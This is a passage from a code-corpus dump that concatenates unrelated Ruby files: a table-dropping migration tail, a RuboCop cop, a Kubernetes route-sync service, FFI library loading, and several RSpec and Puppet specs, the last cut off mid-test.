drop_function(:pgt_rmt_codes_set_created_at)
drop_trigger(:rmt_codes, :set_updated_at)
drop_function(:pgt_rmt_codes_set_updated_at)
drop_table(:rmt_codes)
# RMT CLASSIFICATIONS
drop_trigger(:rmt_classifications, :audit_trigger_row)
drop_trigger(:rmt_classifications, :audit_trigger_stm)
drop_trigger(:rmt_classifications, :set_created_at)
drop_function(:pgt_rmt_classifications_set_created_at)
drop_trigger(:rmt_classifications, :set_updated_at)
drop_function(:pgt_rmt_classifications_set_updated_at)
drop_table(:rmt_classifications)
# RMT HANDLING REGIMES
drop_trigger(:rmt_handling_regimes, :audit_trigger_row)
drop_trigger(:rmt_handling_regimes, :audit_trigger_stm)
drop_trigger(:rmt_handling_regimes, :set_created_at)
drop_function(:pgt_rmt_handling_regimes_set_created_at)
drop_trigger(:rmt_handling_regimes, :set_updated_at)
drop_function(:pgt_rmt_handling_regimes_set_updated_at)
drop_table(:rmt_handling_regimes)
# RMT VARIANTS
drop_trigger(:rmt_variants, :audit_trigger_row)
drop_trigger(:rmt_variants, :audit_trigger_stm)
drop_trigger(:rmt_variants, :set_created_at)
drop_function(:pgt_rmt_variants_set_created_at)
drop_trigger(:rmt_variants, :set_updated_at)
drop_function(:pgt_rmt_variants_set_updated_at)
drop_table(:rmt_variants)
# RMT CLASSIFICATION TYPES
drop_trigger(:rmt_classification_types, :audit_trigger_row)
drop_trigger(:rmt_classification_types, :audit_trigger_stm)
drop_trigger(:rmt_classification_types, :set_created_at)
drop_function(:pgt_rmt_classification_types_set_created_at)
drop_trigger(:rmt_classification_types, :set_updated_at)
drop_function(:pgt_rmt_classification_types_set_updated_at)
drop_table(:rmt_classification_types)
# RIPENESS CODES
drop_trigger(:ripeness_codes, :audit_trigger_row)
drop_trigger(:ripeness_codes, :audit_trigger_stm)
drop_trigger(:ripeness_codes, :set_created_at)
drop_function(:pgt_ripeness_codes_set_created_at)
drop_trigger(:ripeness_codes, :set_updated_at)
drop_function(:pgt_ripeness_codes_set_updated_at)
drop_table(:ripeness_codes)
end
end
| 37.190283 | 101 | 0.675376 |
f7b6420d0036c05f0c477173d4bf442090f7e2ce | 2,260 | # encoding: utf-8
module RuboCop
module Cop
module Performance
# This cop is used to identify usages of
#
# @example
# # bad
# [1, 2, 3, 4].map { |e| [e, e] }.flatten(1)
# [1, 2, 3, 4].collect { |e| [e, e] }.flatten(1)
#
# # good
# [1, 2, 3, 4].flat_map { |e| [e, e] }
# [1, 2, 3, 4].map { |e| [e, e] }.flatten
# [1, 2, 3, 4].collect { |e| [e, e] }.flatten
class FlatMap < Cop
MSG = 'Use `flat_map` instead of `%s...%s`.'
FLATTEN_MULTIPLE_LEVELS = ' Beware, `flat_map` only flattens 1 level ' \
'and `flatten` can be used to flatten ' \
'multiple levels.'
FLATTEN = [:flatten, :flatten!]
def on_send(node)
left, second_method, flatten_param = *node
return unless FLATTEN.include?(second_method)
flatten_level, = *flatten_param
expression, = *left
_array, first_method = *expression
return unless first_method == :map || first_method == :collect
message = MSG
if cop_config['EnabledForFlattenWithoutParams'] && flatten_level.nil?
message = MSG + FLATTEN_MULTIPLE_LEVELS
else
return unless flatten_level == 1
end
range = Parser::Source::Range.new(node.loc.expression.source_buffer,
expression.loc.selector.begin_pos,
node.loc.selector.end_pos)
add_offense(node, range, format(message, first_method, second_method))
end
def autocorrect(node)
receiver, _flatten, flatten_param = *node
flatten_level, = *flatten_param
return if flatten_level.nil?
array, = *receiver
lambda do |corrector|
range = Parser::Source::Range.new(node.loc.expression.source_buffer,
node.loc.dot.begin_pos,
node.loc.expression.end_pos)
corrector.remove(range)
corrector.replace(array.loc.selector, 'flat_map')
end
end
end
end
end
end
| 34.242424 | 80 | 0.511947 |
d581f0d0713e237a6f81b3c475c340b951b9673b | 8,548 | # frozen_string_literal: true
class Integration::KubernetesService < Integration::ServiceBase
attr_reader :namespace
class_attribute :maintain_tls_spec,
default: ActiveModel::Type::Boolean.new.cast(ENV['KUBERNETES_ROUTE_TLS'])
def initialize(integration, namespace: self.class.namespace)
super(integration)
@namespace = namespace
@client = K8s::Client.autoconfig(namespace: namespace).extend(MergePatch)
end
module MergePatch
# @param resource [K8s::Resource]
# @param attrs [Hash]
# @return [K8s::Client]
def merge_resource(resource, attrs)
client_for_resource(resource).merge_patch(resource.metadata.name, attrs)
end
end
def self.namespace
ENV.fetch('KUBERNETES_NAMESPACE') { File.read(File.join((ENV['TELEPRESENCE_ROOT'] || '/'), 'var/run/secrets/kubernetes.io/serviceaccount/namespace')) }
end
def call(entry)
case entry.record
when Proxy then handle_proxy(entry)
when Provider then handle_provider(entry)
end
end
def handle_proxy(entry)
persist_proxy?(entry) ? persist_proxy(entry) : delete_proxy(entry)
end
def handle_provider(entry)
persist?(entry) ? persist_provider(entry) : delete_provider(entry)
end
attr_reader :client
def persist_proxy?(entry)
entry.data&.dig('deployment_option') == 'hosted'
end
def persist?(entry)
entry.data
end
def owner_reference_controller(resource)
owner_references = resource.metadata.ownerReferences or return
controller = owner_references.find(&:controller)
controller.metadata = { namespace: namespace, name: controller.name }
client.get_resource(controller)
end
def owner_reference_root(resource)
while (owner = owner_reference_controller(resource))
resource = owner
end
resource
rescue K8s::Error::Forbidden
# likely some resource like the operator
resource
end
def get_owner
pod_name = ENV['KUBERNETES_POD_NAME'] || ENV['POD_NAME'] || ENV['HOSTNAME']
pod = client.api('v1').resource('pods', namespace: namespace).get(pod_name)
owner_reference_root(pod)
end
def as_reference(owner)
K8s::API::MetaV1::OwnerReference.new(
kind: owner.kind,
apiVersion: owner.apiVersion,
name: owner.metadata.name,
uid: owner.metadata.uid
)
end
def annotations_for(entry)
{
'3scale.net/gid': entry.to_gid.to_s,
'zync.3scale.net/gid': entry.model.record.to_gid.to_s,
}
end
def label_selector_from(resource)
resource.metadata.labels.to_h.with_indifferent_access.slice(
'3scale.net/created-by', '3scale.net/tenant_id', 'zync.3scale.net/record', 'zync.3scale.net/route-to'
)
end
def labels_for(entry)
{
'3scale.net/created-by': 'zync',
'3scale.net/tenant_id': String(entry.tenant_id),
'zync.3scale.net/record': entry.model.record.to_gid_param,
}
end
def labels_for_proxy(entry)
service_id = entry.last_known_data.fetch('service_id') { return }
labels_for(entry).merge(
'zync.3scale.net/ingress': 'proxy',
'3scale.net/service_id': String(service_id)
)
end
def labels_for_provider(entry)
provider_id = entry.last_known_data.fetch('id')
labels_for(entry).merge(
'zync.3scale.net/ingress': 'provider',
'3scale.net/provider_id': String(provider_id)
)
end
class Route < K8s::Resource
def initialize(attributes, **options)
super attributes.with_indifferent_access
.merge(apiVersion: 'route.openshift.io/v1', kind: 'Route')
.reverse_merge(metadata: {}), **options
end
end
class RouteSpec < K8s::Resource
def initialize(url, service, port)
uri = URI(url)
tls_options = {
insecureEdgeTerminationPolicy: 'Redirect',
termination: 'edge'
} if uri.class == URI::HTTPS || uri.scheme.blank?
super({
host: uri.host || uri.path,
port: { targetPort: port },
to: {
kind: 'Service',
name: service
}
}.merge(tls: tls_options))
end
end
def build_proxy_routes(entry)
build_routes('zync-3scale-api-', [
RouteSpec.new(entry.data.fetch('endpoint'), 'apicast-production', 'gateway'),
RouteSpec.new(entry.data.fetch('sandbox_endpoint'), 'apicast-staging', 'gateway')
], labels: labels_for_proxy(entry), annotations: annotations_for(entry))
end
def build_routes(name, specs = [], owner: get_owner, **metadata)
specs.map do |spec|
Route.new(
metadata: {
generateName: name,
namespace: namespace,
labels: owner.metadata.labels,
ownerReferences: [as_reference(owner)]
}.deep_merge(metadata.deep_merge(
labels: {
'zync.3scale.net/route-to': spec.to_h.dig(:to, :name),
},
annotations: {
'zync.3scale.net/host': spec.host,
}
)),
spec: spec
)
end
end
def build_provider_routes(entry)
data = entry.data
domain, admin_domain = data.values_at('domain', 'admin_domain')
metadata = { labels: labels_for_provider(entry), annotations: annotations_for(entry) }
if admin_domain == domain # master account
build_routes('zync-3scale-master-', [
RouteSpec.new(data.fetch('domain'), 'system-master', 'http')
], **metadata)
else
build_routes('zync-3scale-provider-', [
RouteSpec.new(data.fetch('domain'), 'system-developer', 'http'),
RouteSpec.new(data.fetch('admin_domain'), 'system-provider', 'http')
], **metadata)
end
end
def cleanup_but(list, label_selector)
client
.client_for_resource(list.first, namespace: namespace)
.list(labelSelector: label_selector)
.each do |resource|
equal = list.any? { |object| object.metadata.uid === resource.metadata.uid && resource.metadata.selfLink == object.metadata.selfLink }
Rails.logger.warn "Deleting #{resource.metadata} from k8s because it is not on #{list}"
client.delete_resource(resource) unless equal
end
end
def extract_route_patch(resource)
{
metadata: resource.metadata.to_h,
spec: { host: resource.spec.host },
}
end
protected def persist_resources(list)
list.map do |resource|
existing = client
.client_for_resource(resource, namespace: namespace)
.list(labelSelector: label_selector_from(resource))
client.get_resource case existing.size
when 0
client.create_resource(resource)
when 1
update_resource(existing.first, resource)
else
existing.each(&client.method(:delete_resource))
client.create_resource(resource)
end
end
end
def cleanup_routes(routes)
routes.each do |route|
begin
verify_route_status(route)
rescue InvalidStatus => error
# they need to be re-created anyway, OpenShift won't re-admit them
client.delete_resource(route) if error.reason == 'HostAlreadyClaimed' && error.type == 'Admitted'
raise
end
end
end
class InvalidStatus < StandardError
attr_reader :type, :reason
def initialize(condition)
@type, @reason = condition.type, condition.reason
super(condition.message)
end
end
def verify_route_status(route)
ingress = route.status.ingress.find { |ingress| ingress.host == route.spec.host }
condition = ingress.conditions.find { |condition| condition.type = 'Admitted' }
raise InvalidStatus, condition unless condition.status == 'True'
end
def update_resource(existing, resource)
resource.spec.delete_field(:tls) if maintain_tls_spec?
client.merge_resource(existing, resource)
rescue K8s::Error::Invalid
resource.spec.tls = existing.spec.tls if maintain_tls_spec?
client.delete_resource(existing)
client.create_resource(resource)
end
def persist_proxy(entry)
routes = build_proxy_routes(entry)
cleanup_routes persist_resources(routes)
end
def delete_proxy(entry)
label_selector = labels_for_proxy(entry)
cleanup_but([Route.new({})], label_selector)
end
def persist_provider(entry)
routes = build_provider_routes(entry)
cleanup_routes persist_resources(routes)
end
def delete_provider(entry)
label_selector = labels_for_provider(entry)
cleanup_but([Route.new({})], label_selector)
end
end
| 28.684564 | 155 | 0.662494 |
037ddc28b6d57f920d637f731f7502bccd2823e4 | 854 | # frozen_string_literal: true
require "active_support"
require "active_support/core_ext/class/attribute"
require "active_support/core_ext/object/inclusion"
require "spicerack/version"
require "around_the_world"
require "short_circu_it"
require "substance"
require "tablesalt"
require "technologic"
require "redis_hash"
require "spicerack/array_index"
require "spicerack/hash_model"
require "spicerack/redis_model"
module Spicerack
class Error < StandardError; end
include ActiveSupport::Deprecation::DeprecatedConstantAccessor
deprecate_constant "RootObject", "Substance::RootObject"
deprecate_constant "AttributeObject", "Substance::AttributeObject"
deprecate_constant "InputModel", "Substance::InputModel"
deprecate_constant "InputObject", "Substance::InputObject"
deprecate_constant "OutputObject", "Substance::OutputObject"
end
| 26.6875 | 68 | 0.818501 |
d51fd0bfd4cb31e791bab1619fec6b09727e5fee | 940 | require 'opal/jquery/element'
module Browser
# {Window} instances are {Native} objects used to wrap native window instances.
#
# Generally, you will want to use the top level {::Window} instance, which
# wraps `window` from the main page.
class Window
include Native
# Returns this {Window} instance wrapped as an {Element}. Useful for
# delegating jQuery events, which allows the use of `window` as target.
#
# @return [Element]
def element
@element ||= Element.find(`window`)
end
# @see Element#on
def on(*args, &block)
element.on(*args, &block)
end
# @see Element#off
def off(*args, &block)
element.off(*args, &block)
end
# @see Element#trigger
def trigger(*args)
element.trigger(*args)
end
end
end
# Top level {Browser::Window} instance.
Window = Browser::Window.new(`window`)
# TODO: this will be removed soon.
$window = Window
| 22.926829 | 81 | 0.648936 |
26e2e67ebb468b320dd0365ae8aef2f799b1b2c1 | 672 | require "spec_helper"
feature "Manage Sessions" do
background do
create(:event, :full_event)
end
scenario "As a guest, I want to register " do
visit root_path
click_link "add-sessions-button"
click_link "Register here"
fill_in 'participant_name', with: 'Jack Johnson'
fill_in 'Your email', with: '[email protected]'
fill_in 'Password', with: 's00persekret'
click_button "Create Participant"
click_link "add-sessions-button"
fill_in('Title', with: 'Rails 4 FTW')
fill_in('Description', with: 'Rails Desc')
click_button 'Create Session'
expect(page).to have_content 'Thanks for adding your session.'
end
end
| 24 | 66 | 0.697917 |
384df5b668cb303622d07cc0c288517087f3356a | 3,202 | require 'spec_helper'
describe 'nova::conductor' do
let :pre_condition do
'include nova'
end
shared_examples 'nova-conductor' do
it { is_expected.to contain_package('nova-conductor').with(
:name => platform_params[:conductor_package_name],
:ensure => 'present'
) }
it { is_expected.to contain_service('nova-conductor').with(
:name => platform_params[:conductor_service_name],
:hasstatus => 'true',
:ensure => 'running'
)}
context 'with manage_service as false' do
let :params do
{ :enabled => true,
:manage_service => false
}
end
it { is_expected.to contain_service('nova-conductor').without_ensure }
end
context 'with package version' do
let :params do
{ :ensure_package => '2012.1-2' }
end
it { is_expected.to contain_package('nova-conductor').with(
:ensure => params[:ensure_package]
)}
end
context 'with overridden workers parameter' do
let :params do
{:workers => '5' }
end
it { is_expected.to contain_nova_config('conductor/workers').with_value('5') }
end
context 'with default enable_new_services parameter' do
it { is_expected.to contain_nova_config('DEFAULT/enable_new_services').with_value('<SERVICE DEFAULT>') }
end
context 'with enable_new_services parameter set to false' do
let :params do
{ :enable_new_services => false }
end
it { is_expected.to contain_nova_config('DEFAULT/enable_new_services').with_value(false) }
end
context 'with default database parameters' do
let :pre_condition do
"include nova"
end
it { is_expected.to_not contain_nova_config('database/connection') }
it { is_expected.to_not contain_nova_config('database/slave_connection') }
it { is_expected.to_not contain_nova_config('database/connection_recycle_time').with_value('<SERVICE DEFAULT>') }
end
context 'with overridden database parameters' do
let :pre_condition do
"class { 'nova':
database_connection => 'mysql://user:pass@db/db',
slave_connection => 'mysql://user:pass@slave/db',
database_idle_timeout => '30',
}
"
end
it { is_expected.to contain_oslo__db('nova_config').with(
:connection => 'mysql://user:pass@db/db',
:slave_connection => 'mysql://user:pass@slave/db',
:connection_recycle_time => '30',
)}
end
end
on_supported_os({
:supported_os => OSDefaults.get_supported_os
}).each do |os,facts|
context "on #{os}" do
let (:facts) do
facts.merge!(OSDefaults.get_facts())
end
let (:platform_params) do
case facts[:osfamily]
when 'Debian'
{ :conductor_package_name => 'nova-conductor',
:conductor_service_name => 'nova-conductor' }
when 'RedHat'
{ :conductor_package_name => 'openstack-nova-conductor',
:conductor_service_name => 'openstack-nova-conductor' }
end
end
it_configures 'nova-conductor'
end
end
end
| 28.336283 | 119 | 0.62055 |
5d0d949ea60b666bdb32a34feec3c6a5755ae608 | 3,235 | # instantiate IdGen with make_class and
# call mint_id and update_metadata for it to choose and mint the right types of ids based on tenant config
#
# Instance of this class is really never used directly by outside code, but one of the subclasses is used.
# require 'stash/doi/datacite_gen'
# require 'stash/doi/ezid_gen'
module Stash
module Doi
class IdGen
attr_reader :resource
# this is to take the place of the normal initialize to create a class of the correct type
def self.make_instance(resource:)
id_svc = resource.tenant.identifier_service
if id_svc.provider == 'ezid'
EzidGen.new(resource: resource)
elsif id_svc.provider == 'datacite'
DataciteGen.new(resource: resource)
end
end
# select correct identifier service class based on resource (and tenant) and mint an id
def self.mint_id(resource:)
id_gen = make_instance(resource: resource)
id_gen.mint_id
end
# The method reserves a DOI if needed for a specified DOI or minting one from the pool. (formerly?) used by Merritt
# submission to be sure a (minted if needed) stash_engine_identifier exists with the ID filled in before doing fun stuff
def ensure_identifier
# ensure an existing identifier is reserved (if needed for EZID)
if resource.identifier && resource.identifier.identifier # if identifier has value
log_info("ensuring identifier is reserved for resource #{resource.id}, ident: #{resource.identifier_str}")
return resource.identifier.to_s if resource.skip_datacite_update
return reserve_id(doi: resource.identifier.to_s) # reserve_id is smart and doesn't reserve again if it already exists
end
# otherwise create a new one
log_info("minting new identifier for resource #{resource.id}")
# this ensures it has a stash_engine_identifier for the resource, mint_id is either EZID or DC mint method
resource.ensure_identifier(mint_id)
end
def update_identifier_metadata!
log_info("updating identifier landing page (#{landing_page_url}) and metadata for resource #{resource.id} (#{resource.identifier_str})")
sp = Stash::Merritt::SubmissionPackage.new(resource: resource, packaging: nil)
dc4_xml = sp.dc4_builder.contents
update_metadata(dc4_xml: dc4_xml, landing_page_url: landing_page_url) unless resource.skip_datacite_update
end
def landing_page_url
@landing_page_url ||= StashEngine::Engine.routes.url_helpers.show_url(resource.identifier_str)
end
def initialize(resource:)
@resource = resource
end
def log_info(message)
Rails.logger.info("#{Time.now.xmlschema} #{self.class}: #{message}")
end
# subclasses should implement mint_id and update_metadata(dc4_xml:, landing_page_url:) methods
private
def tenant
resource.tenant
end
def id_params
@id_params ||= tenant.identifier_service
end
def owner
id_params.owner
end
def password
id_params.password
end
def account
id_params.account
end
end
end
end
| 36.761364 | 144 | 0.692427 |
91b7d3073fa334c2005df8f25ec52c5a80c3cc05 | 198 | class EmailAndPrintTemplateToCommon < ActiveRecord::Migration
def change
rename_column :commons, :template_id, :print_template_id
add_column :commons, :email_template_id, :integer
end
end
| 28.285714 | 61 | 0.80303 |
18c5c3b8c7f5fd3bf996be5fa8892001761ba1f2 | 2,745 | # encoding: UTF-8
require 'ffi'
require 'rbconfig'
module FreeImage
def self.msvc?
# If this is windows we assume FreeImage was compiled with
# MSVC since that is the binary distibution provided on
# the web site. If you have compiled FreeImage yourself
# on windows using another compiler, set this to false.
#
# This is important because FreeImage defines different
# type sizes for MSVC - see types/ffi.rb
FFI::Platform.windows?
end
def self.search_paths
@search_paths ||= begin
if ENV['FREE_IMAGE_LIBRARY_PATH']
[ ENV['FREE_IMAGE_LIBRARY_PATH'] ]
elsif FFI::Platform::IS_WINDOWS
ENV['PATH'].split(File::PATH_SEPARATOR)
else
[ '/usr/local/{lib64,lib32,lib}', '/opt/local/{lib64,lib32,lib}', '/usr/{lib64,lib32,lib}' ]
end
end
end
def self.find_lib(lib)
files = search_paths.inject(Array.new) do |array, path|
file_name = File.expand_path(File.join(path, "#{lib}.#{FFI::Platform::LIBSUFFIX}"))
array << Dir.glob(file_name)
array
end
files.flatten.compact.first
end
def self.free_image_library_paths
@free_image_library_paths ||= begin
libs = %w{libfreeimage libfreeimage.3 libfreeimage-3 FreeImage}
libs.map do |lib|
find_lib(lib)
end.compact
end
end
extend ::FFI::Library
if free_image_library_paths.any?
ffi_lib(*free_image_library_paths)
else
ffi_lib("freeimage")
end
ffi_convention :stdcall if FFI::Platform.windows?
end
# Types
require 'free-image/types/ffi'
require 'free-image/types/boolean'
# More types
require 'free-image/types/rgb_triple'
require 'free-image/types/rgb_quad'
require 'free-image/types/rgb16'
require 'free-image/types/rgba16'
require 'free-image/types/rgbf'
require 'free-image/types/rgbaf'
require 'free-image/types/complex'
require 'free-image/types/info_header'
# Enums
require 'free-image/enums/color_types'
require 'free-image/enums/dithers'
require 'free-image/enums/filters'
require 'free-image/enums/formats'
require 'free-image/enums/image_types'
# Sources
require 'free-image/sources/abstract_source'
require 'free-image/sources/io'
require 'free-image/sources/file'
require 'free-image/sources/memory'
# Modules
require 'free-image/modules/conversions'
require 'free-image/modules/helper'
require 'free-image/modules/icc'
require 'free-image/modules/information'
require 'free-image/modules/modify'
require 'free-image/modules/pixels'
require 'free-image/modules/transforms'
# Main classes
require 'free-image/errors'
require 'free-image/palette'
require 'free-image/scanline'
require 'free-image/bitmap' | 27.45 | 101 | 0.698361 |
28621736f28d1776c86ea73de08e3b52977b105c | 2,355 | # Copyright 2001-2018 Rally Software Development Corp. All Rights Reserved.
require 'spec_helpers/jira_spec_helper'
require 'rspec'
include JiraSpecHelper
describe "The JIRA Custom field for version Tests" do
before(:all) do
#Set current working dir to yeti root, as ca_agile_central2_jira_connector.rb sees it
# Dir.chdir(File.join(File.expand_path(File.dirname(__FILE__)), "/../../.."))
@jira = nil
@rc = nil
@connector = nil
end
before :each do
@konfab = Konfabulator.new(JiraSpecHelper::JIRA_TARGET_RELEASE_CONFIG_FILE)
@rc = RallyConnection.new(@konfab.section("RallyConnection"))
@rc.connect()
@jira = JiraConnection.new(@konfab.section("JiraConnection"))
@connection = @jira
@jira.connect()
@connector = Connector.new(@konfab, @rc, @jira)
end
after(:each) do
@jira.disconnect() if [email protected]?
@rc.disconnect() if [email protected]?
end
it "should create an issue in Rally with a valid Release value and transfer to JIRA" do
# create a Rally defect with a valid Release
fields = { 'Name' => "Valvoline oil change",
'State' => "Submitted",
'Release' => 'lime'
}
rally_defect = @rc.create(fields)
rally_oid = @rc.get_value(rally_defect, "ObjectID")
rally_release = @rc.get_value(rally_defect, "Release")
#puts "The Rally Defect Release value is |#{rally_release}|"
#lambda { rally_release = @rc.get_value(rally_defect, "Release")}.should raise_error(NoMethodError)
# copy Rally defect to Jira bug
@connector.copy_to_other({:artifact => rally_defect})
# find bug in Jira and verify that the TargetRelease value is "lime"
issue = @jira.find_by_external_id(rally_oid)
issue["Target Release"].should == "lime"
end
it "should create a bug in JIRA with a Target Release version and copy the defect to Rally with the correct Release version" do
bug_info = { 'Summary' => "Imaginary Hawaiian Girlfriend",
"Target Release" => "apple",
}
bug, key = create_jira_issue(bug_info, default_external_id=true)
# copy Jira bug to Rally defect
@connector.copy_to_rally({:artifact => bug})
# Rally defect should show a Release of "apple"
rally_defect = @rc.find_by_external_id(key)
rally_defect.Release.should == "apple"
end
end
| 35.149254 | 129 | 0.675584 |
0819623039a45897470b7086444b940880549548 | 3,264 | #
# Author:: Tyler Ball (<[email protected]>)
# Copyright:: Copyright 2010-2016, Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "spec_helper"
require "chef/encrypted_data_bag_item/check_encrypted"
class CheckEncryptedTester
include Chef::EncryptedDataBagItem::CheckEncrypted
end
describe Chef::EncryptedDataBagItem::CheckEncrypted do
let(:tester) { CheckEncryptedTester.new }
it "detects the item is not encrypted when the data is empty" do
expect(tester.encrypted?({})).to eq(false)
end
it "detects the item is not encrypted when the data only contains an id" do
expect(tester.encrypted?({ id: "foo" })).to eq(false)
end
context "when the item is encrypted" do
let(:default_secret) { "abc123SECRET" }
let(:item_name) { "item_name" }
let(:raw_data) do
{
"id" => item_name,
"greeting" => "hello",
"nested" => {
"a1" => [1, 2, 3],
"a2" => { "b1" => true },
},
} end
let(:version) { 1 }
let(:encoded_data) do
Chef::Config[:data_bag_encrypt_version] = version
Chef::EncryptedDataBagItem.encrypt_data_bag_item(raw_data, default_secret)
end
it "does not detect encryption when the item version is unknown" do
# It shouldn't be possible for someone to normally encrypt an item with an unknown version - they would have to
# do something funky like encrypting it and then manually changing the version
modified_encoded_data = encoded_data
modified_encoded_data["greeting"]["version"] = 4
expect(tester.encrypted?(modified_encoded_data)).to eq(false)
end
shared_examples_for "encryption detected" do
it "detects encrypted data bag" do
expect( encryptor ).to receive(:encryptor_keys).at_least(:once).and_call_original
expect(tester.encrypted?(encoded_data)).to eq(true)
end
end
context "when encryption version is 1" do
include_examples "encryption detected" do
let(:version) { 1 }
let(:encryptor) { Chef::EncryptedDataBagItem::Encryptor::Version1Encryptor }
end
end
context "when encryption version is 2" do
include_examples "encryption detected" do
let(:version) { 2 }
let(:encryptor) { Chef::EncryptedDataBagItem::Encryptor::Version2Encryptor }
end
end
context "when encryption version is 3", :aes_256_gcm_only, ruby: "~> 2.0.0" do
include_examples "encryption detected" do
let(:version) { 3 }
let(:encryptor) { Chef::EncryptedDataBagItem::Encryptor::Version3Encryptor }
end
end
end
end
| 33.649485 | 118 | 0.66636 |
ff057f9cf0a8eae59d65548efb3d36f2c4fce940 | 743 | # frozen_string_literal: true
RSpec.describe Spree::WalletPaymentSource do
describe 'setting it as the default' do
it 'reports a payment method changed event for subscriptions that use the default payment source' do
stub_const('Spree::Event', class_spy(Spree::Event))
user = create(:user)
subscription = create(:subscription, user: user)
payment_source = create(:credit_card, user: user)
wallet_payment_source = user.wallet.add(payment_source)
user.wallet.default_wallet_payment_source = wallet_payment_source
expect(Spree::Event).to have_received(:fire).with(
'solidus_subscriptions.subscription_payment_method_changed',
subscription: subscription,
)
end
end
end
| 35.380952 | 104 | 0.732167 |
e9e22d0fdc1f522ba406d4f9529e077e26690d95 | 2,214 | # frozen_string_literal: false
require 'rubygems/test_case'
require 'rubygems'
require 'fileutils'
class TestGemPathSupport < Gem::TestCase
def setup
super
ENV["GEM_HOME"] = @tempdir
ENV["GEM_PATH"] = [@tempdir, "something"].join(File::PATH_SEPARATOR)
end
def test_initialize
ps = Gem::PathSupport.new
assert_equal ENV["GEM_HOME"], ps.home
expected = util_path
assert_equal expected, ps.path, "defaults to GEM_PATH"
end
def test_initialize_home
ps = Gem::PathSupport.new "GEM_HOME" => "#{@tempdir}/foo"
assert_equal File.join(@tempdir, "foo"), ps.home
expected = util_path + [File.join(@tempdir, 'foo')]
assert_equal expected, ps.path
end
if defined?(File::ALT_SEPARATOR) and File::ALT_SEPARATOR
def test_initialize_home_normalize
alternate = @tempdir.gsub(File::SEPARATOR, File::ALT_SEPARATOR)
ps = Gem::PathSupport.new "GEM_HOME" => alternate
assert_equal @tempdir, ps.home, "normalize values"
end
end
def test_initialize_path
ps = Gem::PathSupport.new "GEM_PATH" => %W[#{@tempdir}/foo #{@tempdir}/bar]
assert_equal ENV["GEM_HOME"], ps.home
expected = [
File.join(@tempdir, 'foo'),
File.join(@tempdir, 'bar'),
ENV["GEM_HOME"],
]
assert_equal expected, ps.path
end
def test_initialize_home_path
ps = Gem::PathSupport.new("GEM_HOME" => "#{@tempdir}/foo",
"GEM_PATH" => %W[#{@tempdir}/foo #{@tempdir}/bar])
assert_equal File.join(@tempdir, "foo"), ps.home
expected = [File.join(@tempdir, 'foo'), File.join(@tempdir, 'bar')]
assert_equal expected, ps.path
end
def util_path
ENV["GEM_PATH"].split(File::PATH_SEPARATOR)
end
def test_initialize_spec
ENV["GEM_SPEC_CACHE"] = nil
ps = Gem::PathSupport.new
assert_equal Gem.default_spec_cache_dir, ps.spec_cache_dir
ENV["GEM_SPEC_CACHE"] = 'bar'
ps = Gem::PathSupport.new
assert_equal ENV["GEM_SPEC_CACHE"], ps.spec_cache_dir
ENV["GEM_SPEC_CACHE"] = File.join @tempdir, 'spec_cache'
ps = Gem::PathSupport.new "GEM_SPEC_CACHE" => "foo"
assert_equal "foo", ps.spec_cache_dir
end
end
| 25.744186 | 80 | 0.654472 |
abbeae5546323c4142cc35a3fb295dc970cc5bb7 | 1,120 | cask '[email protected]' do
version '2018.2.9f1,2207421190e9'
sha256 :no_check
url "https://download.unity3d.com/download_unity/2207421190e9/MacEditorTargetInstaller/UnitySetup-Android-Support-for-Editor-2018.2.9f1.pkg"
name 'Android Build Support'
homepage 'https://unity3d.com/unity/'
pkg 'UnitySetup-Android-Support-for-Editor-2018.2.9f1.pkg'
depends_on cask: '[email protected]'
preflight do
if File.exist? "/Applications/Unity"
FileUtils.move "/Applications/Unity", "/Applications/Unity.temp"
end
if File.exist? "/Applications/Unity-2018.2.9f1"
FileUtils.move "/Applications/Unity-2018.2.9f1", '/Applications/Unity'
end
end
postflight do
if File.exist? '/Applications/Unity'
FileUtils.move '/Applications/Unity', "/Applications/Unity-2018.2.9f1"
end
if File.exist? '/Applications/Unity.temp'
FileUtils.move '/Applications/Unity.temp', '/Applications/Unity'
end
end
uninstall quit: 'com.unity3d.UnityEditor5.x',
delete: '/Applications/Unity-2018.2.9f1/PlaybackEngines/AndroidPlayer'
end
| 31.111111 | 142 | 0.716964 |
0803a5e78f9def04323758cd6ac005c88ff2ce23 | 2,195 | # Copyright © 2011 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
require 'spec_helper'
describe Calendar do
let_there_be_lane
let_there_be_j
build_service_request_with_study
it "should have created a calendar when the subjects were created" do
arm1.populate_subjects
arm1.subjects.first.calendar.should_not eq(nil)
end
before :each do
add_visits
end
describe 'populate' do
it "should populate a subject with appointments and procedures" do
sub_service_request.update_attribute(:status, 'submitted')
arm1.populate_subjects
calendar = arm1.subjects.first.calendar
calendar.populate(arm1.visit_groups)
